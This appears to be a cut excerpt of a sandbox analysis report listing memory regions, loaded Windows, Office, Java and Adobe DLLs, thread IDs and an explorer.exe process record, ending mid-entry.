Region: id = 1587 start_va = 0x560000 end_va = 0x561fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1588 start_va = 0x570000 end_va = 0x571fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1589 start_va = 0x580000 end_va = 0x58bfff entry_point = 0x580000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1590 start_va = 0x690000 end_va = 0x697fff entry_point = 0x690000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1591 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x6a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1592 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1593 start_va = 0x2d90000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 1594 start_va = 0x3470000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 1595 start_va = 0x35a0000 end_va = 0x369ffff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 1596 start_va = 0x73f20000 end_va = 0x73f4afff entry_point = 0x73f3d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 1597 start_va = 0x76ae0000 end_va = 0x76b14fff entry_point = 0x76ae145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1598 start_va = 0x77380000 end_va = 0x77385fff entry_point = 0x77381782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1599 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1600 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1601 start_va = 0x37f0000 end_va = 0x382ffff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1602 start_va = 0x74910000 end_va = 0x74916fff entry_point = 0x7491128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1603 start_va = 0x74920000 end_va = 0x7493bfff entry_point = 0x7492a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1604 start_va = 0x74940000 end_va = 0x74983fff entry_point = 0x749563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1622 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1623 start_va = 0x730000 end_va = 0x731fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1624 start_va = 0x28a0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 1625 start_va = 0x74dd0000 end_va = 0x74dfdfff entry_point = 0x74dd0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 1626 start_va = 0x700000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1627 start_va = 0x3830000 end_va = 0x415ffff entry_point = 0x3830000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1628 start_va = 0x74bc0000 end_va = 0x74c0bfff entry_point = 0x74bc2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1633 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1634 start_va = 0x74a60000 end_va = 0x74aedfff entry_point = 0x74a60000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 1635 start_va = 0x74af0000 end_va = 0x74b92fff entry_point = 0x74af0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 1636 start_va = 0x74ba0000 end_va = 0x74bb0fff entry_point = 0x74ba0000 region_type = mapped_file name = "acroiehelpershim.dll" filename = "\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll") Region: id = 1637 start_va = 0x1160000 end_va = 0x116ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 1638 start_va = 0x745c0000 end_va = 0x74643fff entry_point = 0x745c0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1639 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1640 start_va = 0x33f0000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 1641 start_va = 0x74a50000 end_va = 0x74a5ffff entry_point = 0x74a50000 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 1819 start_va = 0x71e30000 end_va = 0x71e32fff entry_point = 0x71e30000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 1820 start_va = 0x71e40000 end_va = 0x71e42fff entry_point = 0x71e40000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 1821 start_va = 0x71e60000 end_va = 0x71e62fff entry_point = 0x71e60000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 1822 start_va = 0x71e70000 end_va = 0x71e72fff entry_point = 0x71e70000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 1823 start_va = 0x71ec0000 end_va = 0x71ec4fff entry_point = 0x71ec0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 1824 start_va = 0x71ed0000 end_va = 0x71ed4fff entry_point = 0x71ed0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 1825 start_va = 0x71ee0000 end_va = 0x71ee2fff entry_point = 0x71ee0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 1826 start_va = 0x71ef0000 end_va = 0x71ef3fff entry_point = 0x71ef0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 1827 start_va = 0x71f20000 end_va = 0x71f23fff entry_point = 0x71f20000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 1828 start_va = 0x71f30000 end_va = 0x7200bfff entry_point = 0x71f30000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 1829 start_va = 0x73460000 end_va = 0x73462fff entry_point = 0x73460000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 1830 start_va = 0x73470000 end_va = 0x73472fff entry_point = 0x73470000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-file-l1-2-0.dll") Region: id = 1831 start_va = 0x73480000 end_va = 0x73482fff entry_point = 0x73480000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 1832 start_va = 0x73510000 end_va = 0x7357cfff entry_point = 0x73510000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\msvcp140.dll") Region: id = 1833 start_va = 0x73940000 end_va = 0x73942fff entry_point = 0x73940000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 1834 start_va = 0x73ed0000 end_va = 0x73ed2fff entry_point = 0x73ed0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-file-l2-1-0.dll") Region: id = 1835 start_va = 0x73ee0000 end_va = 0x73f1bfff entry_point = 0x73ee0000 region_type = mapped_file name = "ochelper.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\OCHelper.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\ochelper.dll") Region: id = 1836 start_va = 0x74560000 end_va = 0x74562fff entry_point = 0x74560000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 1837 start_va = 0x745a0000 end_va = 0x745b4fff entry_point = 0x745a0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\vcruntime140.dll") Region: id = 1838 start_va = 0x748c0000 end_va = 0x748c2fff entry_point = 0x748c0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1839 start_va = 0x74a30000 end_va = 0x74a33fff entry_point = 0x74a30000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 1840 start_va = 0x74a40000 end_va = 0x74a43fff entry_point = 0x74a40000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 1841 start_va = 0x71da0000 end_va = 0x71e13fff entry_point = 0x71da0000 region_type = mapped_file name = "ssv.dll" filename = "\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll") Region: id = 1842 start_va = 0x71e20000 end_va = 0x71e22fff entry_point = 0x71e20000 region_type = mapped_file name = "ochelperresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\1033\\OcHelperResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\1033\\ochelperresource.dll") Region: id = 1843 start_va = 0x74540000 end_va = 0x74548fff entry_point = 0x74541220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1844 start_va = 0x750000 end_va = 0x751fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1845 start_va = 0x4330000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 1846 start_va = 0x71d10000 end_va = 0x71d26fff entry_point = 0x71d10000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\msohev.dll") Region: id = 1847 start_va = 0x71d30000 end_va = 0x71d94fff entry_point = 0x71d30000 region_type = mapped_file name = "urlredir.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\URLREDIR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\urlredir.dll") Region: id = 1848 start_va = 0x9f0000 end_va = 0x9f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 1849 start_va = 0x71b90000 end_va = 0x71d02fff entry_point = 0x71b90000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesX86\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft office\\office16\\grooveex.dll") Region: id = 1850 start_va = 0x71950000 end_va = 0x71b8ffff entry_point = 0x71950000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 1851 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1852 start_va = 0x71790000 end_va = 0x71948fff entry_point = 0x71790000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 1853 start_va = 0x71760000 end_va = 0x7178dfff entry_point = 0x71760000 region_type = mapped_file name = "jp2ssv.dll" filename = "\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll") Region: id = 1854 start_va = 0x37c0000 end_va = 0x37cffff entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 1855 start_va = 0x716a0000 end_va = 0x7175efff entry_point = 0x716a0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files (x86)\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\msvcr100.dll") Region: id = 1856 start_va = 0xf80000 end_va = 0xf81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 1857 start_va = 0x4530000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 1858 start_va = 0x71640000 end_va = 0x7169dfff entry_point = 0x71640000 region_type = mapped_file name = "deploy.dll" filename = "\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll") Region: id = 1859 start_va = 0x756b0000 end_va = 0x756d9fff entry_point = 0x756b0000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 2248 start_va = 0xf80000 end_va = 0xf91fff entry_point = 0xf86b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 2249 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 2250 start_va = 0x1130000 end_va = 0x1137fff entry_point = 0x1130000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\feeds cache\\index.dat") Region: id = 2251 start_va = 0x1140000 end_va = 0x114cfff entry_point = 0x1148057 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 2252 start_va = 0x1150000 end_va = 0x1150fff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2253 start_va = 0x1170000 end_va = 0x1170fff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 2254 start_va = 0x1180000 end_va = 0x1180fff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 2255 start_va = 0x2d10000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 2256 start_va = 0x4540000 end_va = 0x4882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004540000" filename = "" Region: id = 2257 start_va = 0x71050000 end_va = 0x71079fff entry_point = 0x71050000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 2258 start_va = 0x71080000 end_va = 0x71636fff entry_point = 0x71080000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 2259 start_va = 0x71640000 end_va = 0x7169efff entry_point = 0x71642134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2260 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 2261 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 2262 start_va = 0x1300000 end_va = 0x1301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001300000" filename = "" Region: id = 2263 start_va = 0x3320000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2264 start_va = 0x4230000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 2265 start_va = 0x71040000 end_va = 0x7104afff entry_point = 0x71040000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 2266 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Thread: id = 105 os_tid = 0x2ac Thread: id = 106 os_tid = 0x214 Thread: id = 108 os_tid = 0x118 Thread: id = 109 os_tid = 0x210 Thread: id = 110 os_tid = 0x340 Thread: id = 111 os_tid = 0x3f4 Thread: id = 112 os_tid = 0x264 Thread: id = 113 os_tid = 0xae8 Thread: id = 114 os_tid = 0xae4 Thread: id = 152 os_tid = 0x5b0 Process: id = "10" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x75dc9000" os_pid = "0x57c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x8e0" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1869 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1870 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1871 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1872 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1873 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1874 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1875 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1876 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1877 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1878 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1879 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1880 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1881 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1882 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1883 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1884 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1885 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1886 start_va = 0x310000 end_va = 0x325fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1887 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1888 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1889 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1890 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1891 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1892 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1893 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1894 start_va = 0x1b80000 end_va = 0x1f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1895 start_va = 0x1f80000 end_va = 0x1f95fff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1896 start_va = 0x1fa0000 end_va = 0x1fa0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1897 start_va = 0x1fb0000 